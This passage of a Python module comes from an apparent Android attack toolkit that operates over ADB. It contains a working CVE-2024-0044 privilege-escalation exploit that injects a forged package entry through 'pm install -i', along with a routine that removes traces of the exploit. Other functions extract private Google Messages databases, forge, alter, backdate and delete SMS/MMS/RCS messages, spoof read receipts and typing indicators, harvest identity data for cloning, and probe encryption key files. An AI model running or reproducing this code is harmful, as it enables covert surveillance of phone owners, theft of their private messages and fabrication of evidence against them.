Available methods: ' + '(1) Install Archon with SMS permission + Shizuku, ' + '(2) Exploit CVE-2024-0044 on Android 12-13, ' + '(3) Use root access, ' + '(4) Use content provider queries for SMS/MMS only.', + 'fallback': 'content_providers', + } + + def _extract_via_root(self, extract_dir: Path) -> Dict[str, Any]: + """Extract bugle_db via root access.""" + for db_path in BUGLE_DB_PATHS: + check = self._shell(f'su -c "ls {db_path}" 2>/dev/null') + if not self._is_error(check) and 'No such file' not in check: + # Copy to accessible location + staging = '/data/local/tmp/autarch_extract' + self._shell(f'su -c "mkdir -p {staging}"') + for suffix in ['', '-wal', '-shm', '-journal']: + src = f'{db_path}{suffix}' + self._shell(f'su -c "cp {src} {staging}/ 2>/dev/null"') + self._shell(f'su -c "chmod 644 {staging}/{os.path.basename(src)}"') + # Pull files + files_pulled = [] + for suffix in ['', '-wal', '-shm', '-journal']: + fname = f'bugle_db{suffix}' + local_path = str(extract_dir / fname) + pull = self._run_adb(f'pull {staging}/{fname} {local_path}') + if 'bytes' in pull.lower() or os.path.exists(local_path): + files_pulled.append(fname) + # Cleanup + self._shell(f'su -c "rm -rf {staging}"') + if files_pulled: + return { + 'ok': True, 'method': 'root', + 'files': files_pulled, + 'path': str(extract_dir), + 'message': f'Extracted {len(files_pulled)} files via root', + } + return {'ok': False, 'error': 'bugle_db not found via root'} + + def _extract_via_archon(self, extract_dir: Path) -> Dict[str, Any]: + """Extract bugle_db via Archon app's Shizuku-elevated access.""" + # Ask Archon to copy the database to external storage + broadcast = ( + 'shell am broadcast -a com.darkhal.archon.EXTRACT_DB ' + '--es target_package com.google.android.apps.messaging ' + '--es database bugle_db ' + '--es output_dir /sdcard/Download/autarch_extract ' + 'com.darkhal.archon' + ) + result = self._run_adb(broadcast) + if 'Broadcast completed' not in result: + return {'ok': False, 'error': 
'Archon broadcast failed'} + + # Wait for extraction to complete + time.sleep(3) + + # Pull files + staging = '/sdcard/Download/autarch_extract' + files_pulled = [] + for suffix in ['', '-wal', '-shm']: + fname = f'bugle_db{suffix}' + local_path = str(extract_dir / fname) + pull = self._run_adb(f'pull {staging}/{fname} {local_path}') + if 'bytes' in pull.lower() or os.path.exists(local_path): + files_pulled.append(fname) + + # Cleanup staging + self._shell(f'rm -rf {staging}') + + if files_pulled: + return { + 'ok': True, 'method': 'archon', + 'files': files_pulled, 'path': str(extract_dir), + 'message': f'Extracted {len(files_pulled)} files via Archon relay', + } + return {'ok': False, 'error': 'Archon extraction produced no files'} + + def _extract_via_adb_backup(self, extract_dir: Path) -> Dict[str, Any]: + """Extract via adb backup (deprecated on Android 12+ but may work).""" + backup_file = str(extract_dir / 'messaging.ab') + # Try backing up Google Messages + result = self._run_adb( + f'backup -nocompress com.google.android.apps.messaging', + timeout=60, + ) + # Also try telephony provider + result2 = self._run_adb( + f'backup -nocompress com.android.providers.telephony', + timeout=60, + ) + # Check if backup file was created + if os.path.exists(backup_file) and os.path.getsize(backup_file) > 100: + return { + 'ok': True, 'method': 'adb_backup', + 'files': ['messaging.ab'], 'path': str(extract_dir), + 'message': 'ADB backup created (may require user confirmation on device)', + 'note': 'Use extract_ab_file() to parse the .ab backup', + } + return {'ok': False, 'error': 'ADB backup not supported or user denied on device'} + + def query_bugle_db(self, sql: str) -> Dict[str, Any]: + """Run SQL query against a locally extracted bugle_db.""" + # Find the most recent extraction + extractions = sorted(self._extracted_dir.iterdir(), reverse=True) + db_path = None + for ext_dir in extractions: + candidate = ext_dir / 'bugle_db' + if candidate.exists(): + db_path = 
candidate + break + if not db_path: + return {'ok': False, 'error': 'No extracted bugle_db found. Run extract_bugle_db() first.'} + try: + conn = sqlite3.connect(str(db_path)) + conn.row_factory = sqlite3.Row + cursor = conn.execute(sql) + rows = [dict(r) for r in cursor.fetchall()] + conn.close() + return {'ok': True, 'rows': rows, 'count': len(rows), 'db_path': str(db_path)} + except Exception as e: + return {'ok': False, 'error': str(e)} + + def extract_rcs_from_bugle(self) -> Dict[str, Any]: + """Extract only RCS messages from bugle_db (message_protocol >= 2).""" + sql = """ + SELECT m._id, m.conversation_id, m.sent_timestamp, m.received_timestamp, + m.message_protocol, m.message_status, m.read, + p.text AS body, p.content_type, p.uri AS attachment_uri, + c.name AS conversation_name, c.snippet_text, + ppl.normalized_destination AS phone_number, + ppl.full_name AS contact_name, + CASE WHEN ppl.sub_id = -2 THEN 'incoming' ELSE 'outgoing' END AS direction + FROM messages m + LEFT JOIN parts p ON m._id = p.message_id + LEFT JOIN conversations c ON m.conversation_id = c._id + LEFT JOIN conversation_participants cp ON cp.conversation_id = c._id + LEFT JOIN participants ppl ON cp.participant_id = ppl._id + WHERE m.message_protocol >= 2 + ORDER BY m.sent_timestamp DESC + """ + return self.query_bugle_db(sql) + + def extract_conversations_from_bugle(self) -> Dict[str, Any]: + """Full conversation export from bugle_db with all participants.""" + sql = """ + SELECT c._id, c.name, c.snippet_text, c.sort_timestamp, + c.last_read_timestamp, c.participant_count, c.archive_status, + GROUP_CONCAT(ppl.normalized_destination, '; ') AS participants, + GROUP_CONCAT(ppl.full_name, '; ') AS participant_names + FROM conversations c + LEFT JOIN conversation_participants cp ON c._id = cp.conversation_id + LEFT JOIN participants ppl ON cp.participant_id = ppl._id + GROUP BY c._id + ORDER BY c.sort_timestamp DESC + """ + return self.query_bugle_db(sql) + + def extract_message_edits(self) 
-> Dict[str, Any]: + """Get RCS message edit history from bugle_db.""" + sql = """ + SELECT me.message_id, me.latest_message_id, + me.original_rcs_messages_id, + me.edited_at_timestamp_ms, me.received_at_timestamp_ms, + p.text AS current_text + FROM message_edits me + LEFT JOIN messages m ON me.latest_message_id = m._id + LEFT JOIN parts p ON m._id = p.message_id + ORDER BY me.edited_at_timestamp_ms DESC + """ + return self.query_bugle_db(sql) + + def extract_all_from_bugle(self) -> Dict[str, Any]: + """Complete extraction of all messages, conversations, and participants from bugle_db.""" + result = {} + # Messages + sql_msgs = """ + SELECT m._id, m.conversation_id, m.sent_timestamp, m.received_timestamp, + m.message_protocol, m.message_status, m.read, m.seen, + p.text AS body, p.content_type, p.uri AS attachment_uri, + CASE m.message_protocol + WHEN 0 THEN 'SMS' WHEN 1 THEN 'MMS' ELSE 'RCS' + END AS protocol_name + FROM messages m + LEFT JOIN parts p ON m._id = p.message_id + ORDER BY m.sent_timestamp DESC + """ + msgs = self.query_bugle_db(sql_msgs) + result['messages'] = msgs.get('rows', []) if msgs.get('ok') else [] + + # Conversations + convos = self.extract_conversations_from_bugle() + result['conversations'] = convos.get('rows', []) if convos.get('ok') else [] + + # Participants + sql_parts = "SELECT * FROM participants ORDER BY _id" + parts = self.query_bugle_db(sql_parts) + result['participants'] = parts.get('rows', []) if parts.get('ok') else [] + + # Edits + edits = self.extract_message_edits() + result['edits'] = edits.get('rows', []) if edits.get('ok') else [] + + result['ok'] = True + result['total_messages'] = len(result['messages']) + result['total_conversations'] = len(result['conversations']) + result['total_participants'] = len(result['participants']) + + # Save to file + export_path = self._exports_dir / f'bugle_full_export_{datetime.now().strftime("%Y%m%d_%H%M%S")}.json' + with open(export_path, 'w') as f: + json.dump(result, f, indent=2, 
default=str) + result['export_path'] = str(export_path) + return result + + # ══════════════════════════════════════════════════════════════════════ + # §6 CVE-2024-0044 EXPLOIT + # ══════════════════════════════════════════════════════════════════════ + + def check_cve_2024_0044(self) -> Dict[str, Any]: + """Check if device is vulnerable to CVE-2024-0044 (run-as privilege escalation).""" + patch_info = self.get_security_patch_level() + result = { + 'cve': 'CVE-2024-0044', + 'description': RCS_CVES['CVE-2024-0044']['desc'], + 'android_version': patch_info.get('android_version', 'unknown'), + 'security_patch': patch_info.get('security_patch', 'unknown'), + 'vulnerable': patch_info.get('cve_2024_0044_vulnerable', False), + } + if result['vulnerable']: + result['message'] = ('Device appears vulnerable. Android 12/13 with security patch ' + f'before 2024-10-01 (current: {result["security_patch"]})') + else: + result['message'] = 'Device does not appear vulnerable to CVE-2024-0044' + return result + + def exploit_cve_2024_0044(self, target_package: str = 'com.google.android.apps.messaging') -> Dict[str, Any]: + """Execute CVE-2024-0044 run-as privilege escalation. + + This exploits a newline injection in PackageInstallerService to forge + a package entry, allowing run-as access to any app's private data. + Only works on Android 12-13 with security patch before October 2024. 
+ """ + # Verify vulnerability + cve = self.check_cve_2024_0044() + if not cve.get('vulnerable'): + return {'ok': False, 'error': 'Device not vulnerable to CVE-2024-0044', 'details': cve} + + # Step 1: Get target app UID + uid_output = self._shell(f'pm list packages -U | grep {target_package}') + if self._is_error(uid_output) or target_package not in uid_output: + return {'ok': False, 'error': f'Package {target_package} not found'} + + uid_match = re.search(r'uid:(\d+)', uid_output) + if not uid_match: + return {'ok': False, 'error': 'Could not determine target UID'} + target_uid = uid_match.group(1) + + # Step 2: Create a minimal APK to push (we need any valid APK) + # Use an existing small APK from the device + apk_path = self._shell(f'pm path {target_package}') + if self._is_error(apk_path): + return {'ok': False, 'error': 'Cannot find target APK path'} + apk_path = apk_path.replace('package:', '').strip() + + # Copy to writable location + self._shell('cp /system/app/BasicDreams/BasicDreams.apk /data/local/tmp/exploit_carrier.apk 2>/dev/null') + # Fallback: use any small system apk + if 'error' in self._shell('ls /data/local/tmp/exploit_carrier.apk').lower(): + # Try another approach — use settings apk + self._shell('cp /system/priv-app/Settings/Settings.apk /data/local/tmp/exploit_carrier.apk 2>/dev/null') + + # Step 3: Craft the injection payload + victim_name = f'autarch_victim_{int(time.time())}' + payload = ( + f'@null\n' + f'{victim_name} {target_uid} 1 /data/user/0 ' + f'default:targetSdkVersion=28 none 0 0 1 @null' + ) + + # Step 4: Install with injected payload + install_result = self._shell( + f'pm install -i "{payload}" /data/local/tmp/exploit_carrier.apk', + timeout=15, + ) + + # Step 5: Verify access + verify = self._shell(f'run-as {victim_name} id') + if f'uid={target_uid}' in verify or 'u0_a' in verify: + self._cve_exploit_active = True + self._exploit_victim_name = victim_name + return { + 'ok': True, + 'message': f'CVE-2024-0044 exploit 
successful. run-as {victim_name} has UID {target_uid}', + 'victim_name': victim_name, + 'target_uid': target_uid, + 'target_package': target_package, + 'verify': verify, + } + return { + 'ok': False, + 'error': 'Exploit attempt did not achieve expected UID', + 'install_result': install_result, + 'verify': verify, + } + + def _extract_via_cve(self, extract_dir: Path) -> Dict[str, Any]: + """Extract bugle_db using CVE-2024-0044 exploit.""" + if not self._cve_exploit_active: + exploit = self.exploit_cve_2024_0044() + if not exploit.get('ok'): + return exploit + + victim = self._exploit_victim_name + staging = '/data/local/tmp/autarch_cve_extract' + self._shell(f'mkdir -p {staging}') + self._shell(f'chmod 777 {staging}') + + # Use run-as to access and copy databases + for suffix in ['', '-wal', '-shm', '-journal']: + fname = f'bugle_db{suffix}' + for db_base in BUGLE_DB_PATHS: + src = f'{db_base}{suffix}' + self._shell( + f'run-as {victim} sh -c "cat {src}" > {staging}/{fname} 2>/dev/null' + ) + + # Pull extracted files + files_pulled = [] + for suffix in ['', '-wal', '-shm', '-journal']: + fname = f'bugle_db{suffix}' + local_path = str(extract_dir / fname) + pull = self._run_adb(f'pull {staging}/{fname} {local_path}') + if os.path.exists(local_path) and os.path.getsize(local_path) > 0: + files_pulled.append(fname) + + # Cleanup + self._shell(f'rm -rf {staging}') + + if files_pulled: + return { + 'ok': True, 'method': 'cve-2024-0044', + 'files': files_pulled, 'path': str(extract_dir), + 'message': f'Extracted {len(files_pulled)} files via CVE-2024-0044', + } + return {'ok': False, 'error': 'CVE extract produced no files'} + + def cleanup_cve_exploit(self) -> Dict[str, Any]: + """Remove traces of CVE-2024-0044 exploit.""" + results = [] + if self._exploit_victim_name: + # Uninstall the forged package + out = self._shell(f'pm uninstall {self._exploit_victim_name}') + results.append(f'Uninstall {self._exploit_victim_name}: {out}') + # Remove staging files + 
self._shell('rm -f /data/local/tmp/exploit_carrier.apk') + self._shell('rm -rf /data/local/tmp/autarch_cve_extract') + self._cve_exploit_active = False + self._exploit_victim_name = None + return {'ok': True, 'cleanup': results} + + # ══════════════════════════════════════════════════════════════════════ + # §7 MESSAGE FORGING + # ══════════════════════════════════════════════════════════════════════ + + def forge_sms(self, address: str, body: str, msg_type: int = MSG_TYPE_INBOX, + timestamp: Optional[int] = None, contact_name: Optional[str] = None, + read: int = 1) -> Dict[str, Any]: + if not address or not body: + return {'ok': False, 'error': 'Address and body are required'} + ts = timestamp or self._ts_ms() + bindings = { + 'address': address, + 'body': body, + 'type': msg_type, + 'date': ts, + 'date_sent': ts, + 'read': read, + 'seen': 1, + } + result = self._content_insert(SMS_URI, bindings) + if self._is_error(result): + return {'ok': False, 'error': result} + entry = { + 'address': address, 'body': body, 'type': msg_type, + 'timestamp': ts, 'contact_name': contact_name, + 'action': 'forge_sms', 'time': datetime.now().isoformat(), + } + self._forged_log.append(entry) + return {'ok': True, 'message': 'SMS forged successfully', 'details': entry} + + def forge_mms(self, address: str, subject: str = '', body: str = '', + msg_box: int = MMS_BOX_INBOX, timestamp: Optional[int] = None) -> Dict[str, Any]: + if not address: + return {'ok': False, 'error': 'Address required'} + ts = timestamp or int(time.time()) + bindings = { + 'msg_box': msg_box, + 'date': ts, + 'read': 1, + 'seen': 1, + } + if subject: + bindings['sub'] = subject + result = self._content_insert(MMS_URI, bindings) + if self._is_error(result): + return {'ok': False, 'error': result} + entry = { + 'address': address, 'subject': subject, 'body': body, + 'action': 'forge_mms', 'time': datetime.now().isoformat(), + } + self._forged_log.append(entry) + return {'ok': True, 'message': 'MMS forged', 
'details': entry} + + def forge_rcs(self, address: str, body: str, msg_type: int = MSG_TYPE_INBOX, + timestamp: Optional[int] = None) -> Dict[str, Any]: + """Forge an RCS message. + + Attempts content://rcs/ provider first, falls back to Archon relay + for direct bugle_db insertion. + """ + if not address or not body: + return {'ok': False, 'error': 'Address and body required'} + ts = timestamp or self._ts_ms() + + # Try AOSP RCS provider + bindings = { + 'rcs_text': body, + 'origination_timestamp': ts, + } + result = self._content_insert(f'{RCS_P2P_THREAD_URI}/0/incoming_message', bindings) + if not self._is_error(result) and 'SecurityException' not in result: + entry = { + 'address': address, 'body': body, 'type': msg_type, + 'timestamp': ts, 'method': 'rcs_provider', + 'action': 'forge_rcs', 'time': datetime.now().isoformat(), + } + self._forged_log.append(entry) + return {'ok': True, 'message': 'RCS message forged via provider', 'details': entry} + + # Fallback: Archon relay + broadcast = ( + f'shell am broadcast -a com.darkhal.archon.FORGE_RCS ' + f'--es address "{address}" ' + f'--es body "{body}" ' + f'--ei type {msg_type} ' + f'--el timestamp {ts} ' + f'com.darkhal.archon' + ) + result = self._run_adb(broadcast) + method = 'archon' if 'Broadcast completed' in result else 'failed' + entry = { + 'address': address, 'body': body, 'type': msg_type, + 'timestamp': ts, 'method': method, + 'action': 'forge_rcs', 'time': datetime.now().isoformat(), + } + self._forged_log.append(entry) + if method == 'archon': + return {'ok': True, 'message': 'RCS message forged via Archon', 'details': entry} + return {'ok': False, 'error': 'RCS forging requires Archon app or elevated access'} + + def forge_conversation(self, address: str, messages: List[Dict], + contact_name: Optional[str] = None) -> Dict[str, Any]: + if not address or not messages: + return {'ok': False, 'error': 'Address and messages required'} + results = [] + for msg in messages: + body = msg.get('body', '') + 
msg_type = int(msg.get('type', MSG_TYPE_INBOX)) + ts = msg.get('timestamp') + if ts: + ts = int(ts) + r = self.forge_sms(address, body, msg_type, ts, contact_name) + results.append(r) + ok_count = sum(1 for r in results if r.get('ok')) + return { + 'ok': ok_count > 0, + 'message': f'Forged {ok_count}/{len(messages)} messages', + 'results': results, + } + + def bulk_forge(self, messages_list: List[Dict]) -> Dict[str, Any]: + results = [] + for msg in messages_list: + r = self.forge_sms( + address=msg.get('address', ''), + body=msg.get('body', ''), + msg_type=int(msg.get('type', MSG_TYPE_INBOX)), + timestamp=int(msg['timestamp']) if msg.get('timestamp') else None, + contact_name=msg.get('contact_name'), + read=int(msg.get('read', 1)), + ) + results.append(r) + ok_count = sum(1 for r in results if r.get('ok')) + return {'ok': ok_count > 0, 'forged': ok_count, 'total': len(messages_list)} + + def import_sms_backup_xml(self, xml_content: str) -> Dict[str, Any]: + """Import SMS from SMS Backup & Restore XML format.""" + try: + root = ET.fromstring(xml_content) + except ET.ParseError as e: + return {'ok': False, 'error': f'Invalid XML: {e}'} + count = 0 + errors = [] + for sms_elem in root.findall('.//sms'): + address = sms_elem.get('address', '') + body = sms_elem.get('body', '') + msg_type = int(sms_elem.get('type', '1')) + date = sms_elem.get('date') + read = int(sms_elem.get('read', '1')) + if not address: + continue + ts = int(date) if date else None + result = self.forge_sms(address, body, msg_type, ts, read=read) + if result.get('ok'): + count += 1 + else: + errors.append(result.get('error', 'unknown')) + return { + 'ok': count > 0, + 'imported': count, + 'errors': len(errors), + 'error_details': errors[:10], + } + + # ══════════════════════════════════════════════════════════════════════ + # §8 MESSAGE MODIFICATION + # ══════════════════════════════════════════════════════════════════════ + + def modify_message(self, msg_id: int, new_body: Optional[str] = None, + 
new_timestamp: Optional[int] = None, new_type: Optional[int] = None, + new_read: Optional[int] = None) -> Dict[str, Any]: + bindings = {} + if new_body is not None: + bindings['body'] = new_body + if new_timestamp is not None: + bindings['date'] = new_timestamp + if new_type is not None: + bindings['type'] = new_type + if new_read is not None: + bindings['read'] = new_read + if not bindings: + return {'ok': False, 'error': 'No modifications specified'} + result = self._content_update(f'{SMS_URI}{msg_id}', bindings) + if self._is_error(result): + return {'ok': False, 'error': result} + return {'ok': True, 'message': f'Message {msg_id} modified', 'changes': bindings} + + def delete_message(self, msg_id: int) -> Dict[str, Any]: + result = self._content_delete(f'{SMS_URI}{msg_id}') + if self._is_error(result): + return {'ok': False, 'error': result} + return {'ok': True, 'message': f'Message {msg_id} deleted'} + + def delete_conversation(self, thread_id: int) -> Dict[str, Any]: + result = self._content_delete(SMS_URI, where=f'thread_id={thread_id}') + if self._is_error(result): + return {'ok': False, 'error': result} + return {'ok': True, 'message': f'Thread {thread_id} deleted'} + + def change_sender(self, msg_id: int, new_address: str) -> Dict[str, Any]: + result = self._content_update(f'{SMS_URI}{msg_id}', {'address': new_address}) + if self._is_error(result): + return {'ok': False, 'error': result} + return {'ok': True, 'message': f'Message {msg_id} sender changed to {new_address}'} + + def shift_timestamps(self, address: str, offset_minutes: int) -> Dict[str, Any]: + safe_addr = address.replace("'", "''") + msgs = self._content_query(SMS_URI, projection='_id:date', + where=f"address='{safe_addr}'") + modified = 0 + offset_ms = offset_minutes * 60 * 1000 + for msg in msgs: + msg_id = msg.get('_id') + old_date = msg.get('date') + if msg_id and old_date: + new_date = int(old_date) + offset_ms + r = self._content_update(f'{SMS_URI}{msg_id}', {'date': new_date}) + if 
not self._is_error(r): + modified += 1 + return {'ok': modified > 0, 'modified': modified, 'total': len(msgs)} + + def mark_all_read(self, thread_id: Optional[int] = None) -> Dict[str, Any]: + where = f'thread_id={thread_id} AND read=0' if thread_id else 'read=0' + result = self._content_update(SMS_URI, {'read': 1}, where=where) + if self._is_error(result): + return {'ok': False, 'error': result} + return {'ok': True, 'message': 'Messages marked as read'} + + def wipe_thread(self, thread_id: int) -> Dict[str, Any]: + # Delete from both SMS and MMS + r1 = self._content_delete(SMS_URI, where=f'thread_id={thread_id}') + r2 = self._content_delete(MMS_URI, where=f'thread_id={thread_id}') + return {'ok': True, 'sms_result': r1, 'mms_result': r2, + 'message': f'Thread {thread_id} wiped'} + + # ══════════════════════════════════════════════════════════════════════ + # §9 RCS EXPLOITATION + # ══════════════════════════════════════════════════════════════════════ + + def read_rcs_features(self, address: str) -> Dict[str, Any]: + """Check RCS capabilities for a phone number.""" + # Try dumpsys for RCS capability info + output = self._shell(f'dumpsys telephony_ims') + features = {'address': address, 'rcs_capable': False, 'features': []} + if output and not self._is_error(output): + if address in output: + features['rcs_capable'] = True + # Parse UCE capabilities + for line in output.splitlines(): + if 'capability' in line.lower() or 'uce' in line.lower(): + features['features'].append(line.strip()) + # Also try Archon query + broadcast = ( + f'shell am broadcast -a com.darkhal.archon.CHECK_RCS_CAPABLE ' + f'--es address "{address}" com.darkhal.archon' + ) + self._run_adb(broadcast) + return {'ok': True, **features} + + def spoof_rcs_read_receipt(self, msg_id: str) -> Dict[str, Any]: + """Spoof a read receipt for an RCS message.""" + # Via content provider update + result = self._content_update( + f'content://rcs/p2p_thread/0/incoming_message/{msg_id}', + {'seen_timestamp': 
self._ts_ms()}, + ) + if not self._is_error(result) and 'SecurityException' not in result: + return {'ok': True, 'message': f'Read receipt spoofed for message {msg_id}'} + # Fallback: Archon + broadcast = ( + f'shell am broadcast -a com.darkhal.archon.SPOOF_READ_RECEIPT ' + f'--es msg_id "{msg_id}" com.darkhal.archon' + ) + r = self._run_adb(broadcast) + return { + 'ok': 'Broadcast completed' in r, + 'message': 'Read receipt spoof attempted via Archon', + } + + def spoof_rcs_typing(self, address: str) -> Dict[str, Any]: + """Send a fake typing indicator via Archon.""" + broadcast = ( + f'shell am broadcast -a com.darkhal.archon.SPOOF_TYPING ' + f'--es address "{address}" com.darkhal.archon' + ) + r = self._run_adb(broadcast) + return { + 'ok': 'Broadcast completed' in r, + 'message': f'Typing indicator spoofed to {address}', + } + + def enumerate_rcs_providers(self) -> Dict[str, Any]: + """Discover all accessible messaging content providers on the device.""" + return self.enumerate_providers() + + def clone_rcs_identity(self) -> Dict[str, Any]: + """Extract RCS registration/identity data for cloning.""" + identity = {} + # Get IMSI/ICCID + identity['imei'] = self._shell('service call iphonesubinfo 1 | grep -o "[0-9a-f]\\{8\\}" | tail -n+2 | head -4') + identity['phone_number'] = self._shell('service call iphonesubinfo 15 | grep -o "[0-9a-f]\\{8\\}" | tail -n+2 | head -4') + # Get RCS provisioning state + for pkg in MESSAGING_PACKAGES: + sp_dir = f'/data/data/{pkg}/shared_prefs/' + files = self._shell(f'run-as {self._exploit_victim_name} ls {sp_dir} 2>/dev/null') \ + if self._cve_exploit_active else '' + if files and not self._is_error(files): + identity[f'{pkg}_shared_prefs'] = files.splitlines() + # Get SIM info + identity['sim_operator'] = self._shell('getprop gsm.sim.operator.alpha') + identity['sim_country'] = self._shell('getprop gsm.sim.operator.iso-country') + identity['network_type'] = self._shell('getprop gsm.network.type') + return {'ok': True, 
'identity': identity} + + def extract_rcs_media(self, msg_id: str) -> Dict[str, Any]: + """Extract media files from RCS messages.""" + # Check MMS parts for media + parts = self._content_query( + f'content://mms/{msg_id}/part', + projection='_id:mid:ct:_data:name', + ) + media_files = [] + for part in parts: + ct = part.get('ct', '') + if ct and ct != 'text/plain' and ct != 'application/smil': + data_path = part.get('_data', '') + if data_path: + # Pull the file + local_name = f"media_{msg_id}_{part.get('_id', 'unknown')}" + ext = ct.split('/')[-1] if '/' in ct else 'bin' + local_path = str(self._exports_dir / f'{local_name}.{ext}') + pull = self._run_adb(f'pull {data_path} {local_path}') + if os.path.exists(local_path): + media_files.append({ + 'content_type': ct, + 'local_path': local_path, + 'device_path': data_path, + 'name': part.get('name', ''), + }) + return {'ok': True, 'media': media_files, 'count': len(media_files)} + + def intercept_archival_broadcast(self) -> Dict[str, Any]: + """Set up interception of GOOGLE_MESSAGES_ARCHIVAL_UPDATE broadcasts. + + This is the enterprise archival broadcast that Google Messages sends + when messages are sent, received, edited, or deleted on managed devices. 
+ """ + # Register a broadcast receiver via Archon + broadcast = ( + 'shell am broadcast -a com.darkhal.archon.REGISTER_ARCHIVAL_LISTENER ' + 'com.darkhal.archon' + ) + r = self._run_adb(broadcast) + info = { + 'broadcast_action': ARCHIVAL_BROADCAST_ACTION, + 'uri_extra_key': ARCHIVAL_URI_EXTRA, + 'note': 'Requires fully managed device with Google Messages as default SMS app', + 'requirement': 'MCM config: messages_archival = com.darkhal.archon', + } + return { + 'ok': 'Broadcast completed' in r, + 'message': 'Archival listener registration attempted', + 'info': info, + } + + def extract_signal_protocol_state(self) -> Dict[str, Any]: + """Extract E2EE Signal Protocol session state (requires elevated access).""" + if not self._cve_exploit_active: + return { + 'ok': False, + 'error': 'Requires CVE-2024-0044 exploit or root access', + 'note': 'Signal Protocol keys are in ' + '/data/data/com.google.android.apps.messaging/files/ ' + 'but master key is in Android Keystore (hardware-backed, not extractable via ADB)', + } + victim = self._exploit_victim_name + # List files in the messaging app's files directory + files = self._shell( + f'run-as {victim} ls -la /data/data/com.google.android.apps.messaging/files/' + ) + # List shared_prefs + prefs = self._shell( + f'run-as {victim} ls -la /data/data/com.google.android.apps.messaging/shared_prefs/' + ) + return { + 'ok': True, + 'files_dir': files.splitlines() if files and not self._is_error(files) else [], + 'shared_prefs': prefs.splitlines() if prefs and not self._is_error(prefs) else [], + 'note': 'Session keys found but master encryption key is hardware-backed in Android Keystore', + } + + def get_rcs_cve_database(self) -> Dict[str, Any]: + """Return known CVEs affecting RCS/Android messaging.""" + return {'ok': True, 'cves': RCS_CVES, 'count': len(RCS_CVES)} + + # ══════════════════════════════════════════════════════════════════════ + # §10 DATABASE BACKUP & CLONE + # 
══════════════════════════════════════════════════════════════════════ + + def full_backup(self, fmt: str = 'json') -> Dict[str, Any]: + """Complete SMS/MMS/RCS backup.""" + timestamp = datetime.now().strftime('%Y%m%d_%H%M%S') + + # Get SMS + sms = self.read_sms_database(limit=10000) + # Get MMS + mms = self.read_mms_database(limit=5000) + # Get conversations + convos = self.read_conversations(limit=1000) + # Try RCS provider + rcs = self.read_rcs_provider() + + backup = { + 'timestamp': timestamp, + 'device': self.get_device_info(), + 'sms': sms, + 'mms': mms, + 'conversations': convos, + 'rcs': rcs if rcs.get('ok') else {}, + 'stats': { + 'sms_count': len(sms), + 'mms_count': len(mms), + 'conversation_count': len(convos), + }, + } + + if fmt == 'xml': + backup_path = self._backups_dir / f'backup_{timestamp}.xml' + self._write_sms_backup_xml(sms, str(backup_path)) + else: + backup_path = self._backups_dir / f'backup_{timestamp}.json' + with open(backup_path, 'w') as f: + json.dump(backup, f, indent=2, default=str) + + return { + 'ok': True, + 'path': str(backup_path), + 'stats': backup['stats'], + 'message': f'Backup saved to {backup_path}', + } + + def _write_sms_backup_xml(self, messages: List[Dict], path: str): + """Write SMS Backup & Restore compatible XML.""" + root = ET.Element('smses', count=str(len(messages))) + for msg in messages: + attrs = { + 'protocol': str(msg.get('protocol', '0') or '0'), + 'address': str(msg.get('address', '') or ''), + 'date': str(msg.get('date', '') or ''), + 'type': str(msg.get('type', '1') or '1'), + 'body': str(msg.get('body', '') or ''), + 'read': str(msg.get('read', '1') or '1'), + 'status': str(msg.get('status', '-1') or '-1'), + 'locked': str(msg.get('locked', '0') or '0'), + 'date_sent': str(msg.get('date_sent', '0') or '0'), + 'readable_date': str(msg.get('date_formatted', '') or ''), + 'contact_name': str(msg.get('contact_name', '(Unknown)') or '(Unknown)'), + } + ET.SubElement(root, 'sms', **attrs) + tree = 
ET.ElementTree(root) + ET.indent(tree, space=' ') + tree.write(path, encoding='unicode', xml_declaration=True) + + def full_restore(self, backup_path: str) -> Dict[str, Any]: + """Restore messages from a backup file.""" + path = Path(backup_path) + if not path.exists(): + # Check in backups dir + path = self._backups_dir / backup_path + if not path.exists(): + return {'ok': False, 'error': f'Backup file not found: {backup_path}'} + + if path.suffix == '.xml': + with open(path, 'r') as f: + return self.import_sms_backup_xml(f.read()) + elif path.suffix == '.json': + with open(path, 'r') as f: + backup = json.load(f) + sms = backup.get('sms', []) + if not sms: + return {'ok': False, 'error': 'No SMS messages in backup'} + return self.bulk_forge(sms) + return {'ok': False, 'error': f'Unsupported format: {path.suffix}'} + + def clone_to_device(self) -> Dict[str, Any]: + """Clone all messages from current device backup to another device. + + Steps: 1) Run full_backup on source, 2) Connect target device, + 3) Run full_restore with the backup file. + """ + backup = self.full_backup() + if not backup.get('ok'): + return backup + return { + 'ok': True, + 'message': 'Backup created. 
Connect target device and call full_restore()', + 'backup_path': backup['path'], + 'stats': backup['stats'], + } + + def export_messages(self, address: Optional[str] = None, fmt: str = 'json') -> Dict[str, Any]: + """Export messages to JSON, CSV, or XML.""" + if address: + msgs = self.get_messages_by_address(address) + else: + msgs = self.read_sms_database(limit=10000) + + timestamp = datetime.now().strftime('%Y%m%d_%H%M%S') + suffix = f'_{address}' if address else '_all' + + if fmt == 'csv': + export_path = self._exports_dir / f'export{suffix}_{timestamp}.csv' + with open(export_path, 'w', newline='') as f: + if msgs: + writer = csv.DictWriter(f, fieldnames=msgs[0].keys()) + writer.writeheader() + writer.writerows(msgs) + elif fmt == 'xml': + export_path = self._exports_dir / f'export{suffix}_{timestamp}.xml' + self._write_sms_backup_xml(msgs, str(export_path)) + else: + export_path = self._exports_dir / f'export{suffix}_{timestamp}.json' + with open(export_path, 'w') as f: + json.dump(msgs, f, indent=2, default=str) + + return { + 'ok': True, + 'path': str(export_path), + 'count': len(msgs), + 'format': fmt, + } + + def list_backups(self) -> Dict[str, Any]: + """List all backup files.""" + backups = [] + for f in sorted(self._backups_dir.iterdir(), reverse=True): + if f.is_file(): + backups.append({ + 'name': f.name, + 'path': str(f), + 'size': f.stat().st_size, + 'modified': datetime.fromtimestamp(f.stat().st_mtime).isoformat(), + }) + return {'ok': True, 'backups': backups, 'count': len(backups)} + + def list_exports(self) -> Dict[str, Any]: + """List all exported files.""" + exports = [] + for f in sorted(self._exports_dir.iterdir(), reverse=True): + if f.is_file(): + exports.append({ + 'name': f.name, + 'path': str(f), + 'size': f.stat().st_size, + 'modified': datetime.fromtimestamp(f.stat().st_mtime).isoformat(), + }) + return {'ok': True, 'exports': exports, 'count': len(exports)} + + def list_extracted_dbs(self) -> Dict[str, Any]: + """List extracted 
